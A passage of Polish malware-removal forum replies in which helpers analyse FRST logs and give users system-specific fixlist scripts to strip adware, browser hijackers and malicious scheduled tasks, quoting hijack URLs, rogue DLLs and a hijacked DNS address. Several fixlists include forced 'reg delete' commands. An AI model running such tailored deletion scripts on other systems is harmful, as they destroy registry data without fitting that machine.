Explorer\Main,Default_Search_URL = http://istart.webssearches.com/web/?type=ds&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://istart.webssearches.com/web/?type=ds&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE&q={searchTerms} HKU\S-1-5-21-1699041526-1260768229-1946834793-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE HKU\S-1-5-21-1699041526-1260768229-1946834793-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://rts.dsrlte.com?affID=na http://www.search.ask.com/?tpid=ORJ-ST-SPE&o=APN11467&pf=V7&trgb=CR&p2=^BED^OSJ000^YY^PL&gct=hp&apn_ptnrs=BED&apn_dtid=^OSJ000^YY^PL&apn_dbr=cr_38.0.2125.111&apn_uid=EBC246C1-4F1E-43C9-9FF0-A37F0A56880A&itbv=12.18.0.81&doi=2014-10-31&psv=&pt=tb SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://istart.webssearches.com/web/?type=ds&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://istart.webssearches.com/web/?type=ds&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://istart.webssearches.com/web/?type=ds&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://istart.webssearches.com/web/?type=ds&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE&q={searchTerms} SearchScopes: HKU\S-1-5-21-1699041526-1260768229-1946834793-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1699041526-1260768229-1946834793-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://istart.webssearches.com/web/?type=ds&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE&q={searchTerms} SearchScopes: HKU\S-1-5-21-1699041526-1260768229-1946834793-1001 -> {5025A078-BCE7-40BD-A9E7-1C00FDC5DDFA} URL = http://www.search.ask.com/web?tpid=ORJ-ST-SPE&o=APN11467&pf=V7&p2=^BED^OSJ000^YY^PL&gct=&itbv=12.18.0.81&apn_uid=EBC246C1-4F1E-43C9-9FF0-A37F0A56880A&apn_ptnrs=BED&apn_dtid=^OSJ000^YY^PL&apn_dbr=cr_38.0.2125.111&doi=2014-10-31&trgb=CR&q={searchTerms}&psv=&pt=tb SearchScopes: HKU\S-1-5-21-1699041526-1260768229-1946834793-1001 -> {F6D549FA-E52C-4BAA-8130-3E0C8CEA0C90} URL = http://rts.dsrlte.com/?affID=na&q={searchTerms}&r=498 BHO: LuuckyCOuppON -> {34085CC6-3EF0-9AD2-7920-DA2AFF3FC4BB} -> C:\ProgramData\LuuckyCOuppON\JD.x64.dll [2014-09-08] () BHO: BetterPRicECheC -> {6E6B5A77-BBD0-D26F-B20E-1A27B5E45576} -> C:\ProgramData\BetterPRicECheC\Xue9cw.x64.dll [2014-09-05] () BHO: WowCooupoon -> {9BD49075-9368-A83F-0BD5-99EE911C9464} -> C:\ProgramData\WowCooupoon\sYIIUFjxO.x64.dll [2014-08-10] () BHO-x32: LuuckyCOuppON -> {34085CC6-3EF0-9AD2-7920-DA2AFF3FC4BB} -> C:\ProgramData\LuuckyCOuppON\JD.dll [2014-09-08] () BHO-x32: Rock Turner 1.0.0.7 -> {527b365c-1bd3-4a66-906f-8729805ce78c} -> C:\Program Files (x86)\Rock Turner\RockTurnerBHO.dll [2015-01-27] (Rock Turner) BHO-x32: BetterPRicECheC -> {6E6B5A77-BBD0-D26F-B20E-1A27B5E45576} -> C:\ProgramData\BetterPRicECheC\Xue9cw.dll [2014-09-05] () StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe http://istart.webssearches.com/?type=sc&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE C:\Program Files (x86)\MyPC Backup C:\Program Files (x86)\Rock Turner C:\ProgramData\253696b0-e9b9-4e71-87e6-dd3f97c02b2a C:\ProgramData\BetterPRicECheC C:\ProgramData\LuuckyCOuppON C:\ProgramData\TEMP C:\ProgramData\WowCooupoon C:\Users\adrian\AppData\Local\Gameo C:\Users\adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gameo.lnk C:\Users\adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gameo C:\Users\adrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Play OGame.lnk C:\Users\adrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Shiginima Launcher SE v1.lnk C:\Users\adrian\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Play OGame.lnk C:\Users\Dawid\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Dawid\AppData\Roaming\Microsoft\Windows\SendTo\Skype.lnk C:\Users\Dawid\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MyPC Backup C:\Windows\System32\drivers\{825c5be7-672f-4c14-9929-48a3a5e1a660}w64.sys C:\Windows\System32\drivers\{8aa67d0b-c01c-4d37-acff-fff3e85a7686}w64.sys C:\Windows\System32\drivers\{8ce1c375-1e13-43f7-a4fd-6530f47c4fde}Gw64.sys C:\Windows\System32\drivers\{e4c6b00c-d06e-4877-9f09-d92a224047b5}w64.sys C:\Windows\System32\drivers\{eb5ff5f5-0862-4d0e-b77f-65f32d94e6ab}w64.sys Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Google\Chrome\Extensions /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome\Extensions /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Google Chrome (na koncie Dawid): Ustawienia > karta Rozszerzenia > odinstaluj MSN Homepage & Bing Search Engine, Rock Turner. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. W systemie są trzy konta: ==================== Accounts: ============================= adrian (S-1-5-21-1699041526-1260768229-1946834793-1003 - Limited - Enabled) => C:\Users\adrian Damian (S-1-5-21-1699041526-1260768229-1946834793-1004 - Administrator - Enabled) => C:\Users\Damian Dawid (S-1-5-21-1699041526-1260768229-1946834793-1001 - Administrator - Enabled) => C:\Users\Dawid Zostały dostarczone logi z konta Dawid, a należy dostarczyć z wszystkich kont, m.in. po to, by był widziany poprawny kontekst przeglądarek. Zaloguj się po kolei na każde poprzez pełny restart systemu (a nie opcje Wyloguj czy Przełącz użytkownika) i na każdym zrób nowe logi FRST z opcji Scan (zaznaczone pole Addition, ale nie Shortcut). Na koncie limitowanym adrian FRST należy uruchomić przez dwuklik, a nie "Uruchom jako Administrator" (to sfałszuje kontekst konta). Dołącz też plik fixlog.txt.

Ten błąd PowerDVD nie wygląda na pochodną infekcji. Infekcje zostały już pomyślnie usunięte i teraz to tylko działania kosmetyczne. 1. Obejście błędu startowego: Start > Uruchom > msconfig i w karcie Uruchamianie odznacz wpis PowerDVD14Agent. 2. Uruchom AdwCleaner. Na razie wybierz tylko opcję Szukaj (nie stosuj jeszcze Usuń) i dostarcz log wynikowy z folderu G:\AdwCleaner.

Z tego zestawu tylko "Search Protect" jest instalacją adware, a jego źródłem był albo uTorrent (ten program od dawna ładuje adware), albo pośredni instalator typu "Asystent pobierania": KLIK. Natomiast Apple Application Support, Apple Software Update, Apple Mobile Device Support oraz Bonjour to typowe składniki paczek Apple typu iTunes - to nie są szkodniki, co najwyżej można je sklasyfikować jako "zbędne" w określonych scenariuszach. W raportach nie widać żadnych oznak ingerencji adware i nie mam się czym zajmować. Zastosuj DelFix, wyczyść foldery Przywracania systemu oraz zaktualizuj produkty Adobe: KLIK.

1. Przez Panel sterowania odinstaluj stare wersje i zbędniki: Adobe Reader 9.1 MUI, ASUS WebStorage. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {9edd0ea8-2819-47c2-8320-b007d5996f8a}Gw64; C:\Windows\System32\drivers\{9edd0ea8-2819-47c2-8320-b007d5996f8a}Gw64.sys [61112 2014-05-16] (StdLib) R2 IHProtect Service; C:\Program Files (x86)\XTab\ProtectService.exe [158896 2015-01-16] (XTab system) R2 WindowsMangerProtect; C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe [487056 2015-02-12] (SysTool PasSame LIMITED) S2 Update webget; "C:\Program Files (x86)\webget\updatewebget.exe" [X] GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.key-find.com/?type=hppp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.key-find.com/?type=hppp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.key-find.com/web/?type=ds&ts=1423735065&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.key-find.com/web/?type=ds&ts=1423735065&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.key-find.com/?type=hppp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.key-find.com/?type=hppp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.key-find.com/web/?type=ds&ts=1423735065&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.key-find.com/web/?type=ds&ts=1423735065&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&q={searchTerms} HKU\S-1-5-21-2304537269-2391276559-412557570-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.key-find.com/?type=hppp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP HKU\S-1-5-21-2304537269-2391276559-412557570-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.key-find.com/web/?type=dspp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&q={searchTerms} HKU\S-1-5-21-2304537269-2391276559-412557570-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.key-find.com/?type=hppp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP HKU\S-1-5-21-2304537269-2391276559-412557570-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.key-find.com/web/?type=dspp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&q={searchTerms} SearchScopes: HKU\S-1-5-21-2304537269-2391276559-412557570-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.key-find.com/web/?type=dspp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&q={searchTerms} SearchScopes: HKU\S-1-5-21-2304537269-2391276559-412557570-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.key-find.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&ts=1423735149&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2304537269-2391276559-412557570-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.key-find.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&ts=1423735149&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2304537269-2391276559-412557570-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.key-find.com/web/?type=dspp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&q={searchTerms} SearchScopes: HKU\S-1-5-21-2304537269-2391276559-412557570-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.key-find.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP&ts=1423735149&type=default&q={searchTerms} BHO-x32: IETabPage Class -> {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} -> C:\Program Files (x86)\XTab\SupTab.dll (Thinknice Co. Limited) BHO-x32: Strong Signal -> {c723a437-2eaf-466d-a95b-3fa0966bf88c} -> C:\Program Files (x86)\Strong Signal\Extensions\c723a437-2eaf-466d-a95b-3fa0966bf88c.dll No File CHR HomePage: Default -> hxxp://www.key-find.com/?type=hppp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP CHR StartupUrls: Default -> "hxxp://www.key-find.com/?type=hppp&ts=1423735133&from=cor&uid=ST9320325AS_5VD3QDGPXXXX5VD3QDGP" FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation) FF HKLM-x32\...\Firefox\Extensions: [fftoolbar2014@etech.com] - C:\Users\ZST2\AppData\Roaming\Mozilla\Firefox\Profiles\rnjoc2g5.default-1394660289860\extensions\fftoolbar2014@etech.com Task: {89D35390-E23B-4F9A-87B4-2FE814087571} - System32\Tasks\{DF4D094B-0912-448A-B8FE-49BF8AC1166A} => pcalua.exe -a "C:\Program Files (x86)\HDvid Codec V6.0\Uninstall.exe" -c /fromcontrolpanel=1 Task: {B0ED85DC-C320-46DD-B868-86E87DBB3612} - System32\Tasks\{EEEF41B2-B597-4575-8C03-5BE3F67C0C49} => pcalua.exe -a "D:\Downloads\sonicstage [1].exe" -d D:\Downloads HKU\S-1-5-21-2304537269-2391276559-412557570-1000\...\MountPoints2: {9dc4f8c3-95cc-11e4-848e-485b395ba884} - F:\_AUTORUN\AUTORUN.EXE HKU\S-1-5-21-2304537269-2391276559-412557570-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> none ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File C:\Program Files (x86)\Mozilla Firefox\plugins C:\Program Files (x86)\XTab C:\ProgramData\{*}.log C:\ProgramData\0780f478-67ce-4ec3-98db-39a65f4618ce C:\ProgramData\IHProtectUpDate C:\ProgramData\WindowsMangerProtect C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Uninstall Google Chrome.lnk C:\Users\ZST2\AppData\Local\{976222BF-FF50-4DE1-95D6-C4AC44D37A0A} C:\Users\ZST2\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\ZST2\AppData\Roaming\key-find C:\Users\ZST2\AppData\Roaming\Microsoft\Excel\wersja%20pierwsza%20Zestawienie%20uczestników%20pr304177612576894628\wersja%20pierwsza%20Zestawienie%20uczestników%20projektu222.xls.lnk C:\Windows\System32\drivers\{9edd0ea8-2819-47c2-8320-b007d5996f8a}Gw64.sys Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ASUS WebStorage" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie przeinstalować. 4. W Google Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Wypowiedz się czy są jeszcze gdzieś widoczne problemy.

Błąd twoprzą obiekty "SMupdate" wstawione do Harmonogramu zadań przez adware. Działania do przeprowadzenia: 1. Odinstaluj zbędny AVG Web TuneUp. O ile to ożliwe, bo widać śladuy użycia AdwCleaner, który uszakadza tę instalację uniewmożliwiając poprawne usunięcie. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {055378E5-2F0E-45CB-9151-639BF513EAC8} - System32\Tasks\{11976E8C-FC32-4DF2-A245-9A4714BC3603} => E:\Gw2Setup.exe Task: {23344DB2-5A38-449E-8ECD-0AF673FFBD56} - System32\Tasks\{9C9CD549-DEC2-4500-9F39-F8C43BCDFB95} => C:\Program Files (x86)\Electronic Arts\The Sims 3\Game\Bin\TS3.exe Task: {3BEC8210-8A2C-4DD5-A840-0D756DBA22C2} - System32\Tasks\{58DBCEFA-5789-442D-8446-B347E47C1133} => C:\Program Files (x86)\Electronic Arts\The Sims 3\Game\Bin\TS3.exe Task: {3F31E3C4-E941-438C-BE3A-8922BD097E3B} - System32\Tasks\{C485A807-6455-4D0F-ACC9-BB89AEB6B9E2} => C:\Program Files (x86)\Electronic Arts\The Sims 3\Game\Bin\TS3.exe Task: {69040DA2-D920-49C3-866F-3475AB07072A} - System32\Tasks\{10A36C0F-E09A-4E70-AC98-24B3E788D9E8} => C:\Program Files (x86)\Electronic Arts\The Sims 3\Game\Bin\TS3.exe Task: {8ED26585-F8CC-4BC9-BEE0-5289A3640B87} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 Task: {B8531187-1D58-4421-8AB4-B7E86BC836A6} - System32\Tasks\{7DD20F97-2663-47AE-AAC5-136DA2D3553A} => pcalua.exe -a C:\Users\akarideah\Desktop\epson374730eu.exe -d C:\Users\akarideah\Desktop Task: {CBAABF7B-3544-4B6A-859B-C93EAD63D174} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 Task: {CCC333B0-F7FE-4D57-8667-ECCC9783CCAB} - \Sense-chromeinstaller No Task File Task: {CE221E00-A0B1-40E2-AFC8-2C7F72B6C727} - System32\Tasks\{E535B474-E802-4277-9A11-4653E17D9D9E} => C:\Program Files (x86)\Electronic Arts\The Sims 3\Game\Bin\TS3W.exe Task: {DA1EB611-5303-4B46-BFEC-34BCAE598F77} - System32\Tasks\{AD83F704-A2CB-46FE-AB33-5D3791E6C206} => pcalua.exe -a C:\Users\akarideah\Downloads\ID3BTH25WW5.exe -d C:\Users\akarideah\Downloads Task: {DB1D035C-AEDE-4B8F-8106-F228132BAA51} - \iWebar-chromeinstaller No Task File Task: {EC112D97-AD95-4A3A-B412-71F36D52F3B8} - System32\Tasks\{4F6CDD9A-5A3A-4F07-BBB2-73B76081A370} => pcalua.exe -a C:\Users\akarideah\Downloads\BluetoothDriverInstaller.exe -d C:\Users\akarideah\Downloads Task: {F5688F47-E948-421A-A38C-F5E4F495C4CE} - System32\Tasks\{C3A216F4-836C-4B16-9EC8-2B8FDBA8B00D} => Chrome.exe http://ui.skype.com/ui/0/6.20.0.104/pl/abandoninstall?page=tsProgressBar Task: {F7236879-517C-4599-A87E-3E365CE6D3CD} - \Sense-firefoxinstaller No Task File HKLM-x32\...\Run: [fst_pl_49] => [X] GroupPolicy: Group Policy on Chrome detected HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKU\S-1-5-21-4172532052-3313334339-3754969203-1001\Software\Microsoft\Internet Explorer\Main,Start Page = https://mysearch.avg.com/?cid={6731300C-B94F-49B2-94E3-78C0C8538A32}&mid=792379c4a21547d2bce4b95e6f048170-32fc416bbae7cfe3d0d6429cdb379f45d45fd5d1&lang=pl&ds=AVG&coid=avgtbavg&cmpid=0215av&pr=fr&d=2014-08-29 21:56:59&v=4.1.0.411&pid=wtu&sg=&sap=hp SearchScopes: HKU\S-1-5-21-4172532052-3313334339-3754969203-1001 -> {9839B5C2-4317-47DB-ADA3-7D5D20FE47CF} URL = http://www.idg.pl?q={searchTerms} C:\Program Files (x86)\Mozilla Firefoxsafeguard-secure-search.xml C:\ProgramData\TEMP Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. 4. Zrób nowy log FRST z opcji Scan, zaznacz pola Addition i Shortcut, by powstały trzy raporty. Dołącz też plik fixlog.txt.

Problem tworzą zadania "SMupdate" w Harmonogramie wprowadzone przez adware/PUP. Wykonaj następujące działania: 1. Odinstaluj FreeRide Games - przypuszczalnie instalacja niepożądana. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {1A3D8FAB-1960-43F3-8897-8C22631B57B9} - System32\Tasks\{CEBB2555-A2C0-4B49-B05B-43D2C3884079} => pcalua.exe -a C:\windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_215_pepper.exe -c -maintain pepperplugin Task: {2BF06457-8618-4A0D-9328-6599FA37FAC8} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 Task: {484B302C-3DA2-4B67-911B-AB57372F64B9} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 Task: {8945D11A-022D-4CA9-8966-C3F303FB7FE9} - System32\Tasks\{B285C06A-2483-4A92-B6E8-7D5DE96BB865} => pcalua.exe -a "C:\Program Files (x86)\YTDownloader\YTDUninstall.exe" Task: {BBEEED3E-448D-4FB8-9839-D36DBE0543A5} - System32\Tasks\SMupdate1 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update1 Task: {EA0A7552-0600-4051-8807-B84784C1872A} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey HKLM-x32\...\Run: [mobilegeni daemon] => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe HKLM-x32\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot HKLM\...\Policies\Explorer: [NoControlPanel] 0 HKU\S-1-5-21-1930146046-466709810-403476640-1001\...\Run: [ViStart] => C:\Users\lenovo\AppData\Roaming\ViStart\ViStart.exe HKU\S-1-5-21-1930146046-466709810-403476640-1001\...\Run: [NukeMetro] => "C:\Users\lenovo\AppData\Roaming\ViStart\ViStart.exe" /nuke_metro HKU\S-1-5-21-1930146046-466709810-403476640-1001\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot BootExecute: ampa HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=180&d=20140617 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=180&d=20140617 HKU\S-1-5-21-1930146046-466709810-403476640-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=180&d=20140617 SearchScopes: HKU\S-1-5-21-1930146046-466709810-403476640-1001 -> DefaultScope {772EDB4B-BC96-4B94-994A-BD90363AA1FD} URL = SearchScopes: HKU\S-1-5-21-1930146046-466709810-403476640-1001 -> {772EDB4B-BC96-4B94-994A-BD90363AA1FD} URL = BHO: No Name -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> No File DPF: HKLM-x32 {4FF78044-96B4-4312-A5B7-FDA3CB328095} C:\Program Files (x86)\FreeRide Games C:\Users\lenovo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\klcp_update_1030_20140206.lnk C:\Users\lenovo\Downloads\EDA1.tmp Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Greener Web" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Log wskazuje infekcję routera: Tcpip\Parameters: [DhcpNameServer] 91.194.254.105 8.8.8.8 Objaśnij co to znaczy "dns z pliku są już inne." Czy masz na myśli, że DNS przedstawione przez FRST są nieaktualne i na routerze już skorygowane? Czy na pewno w ustawieniach routera nie widnieje podany tu IP?

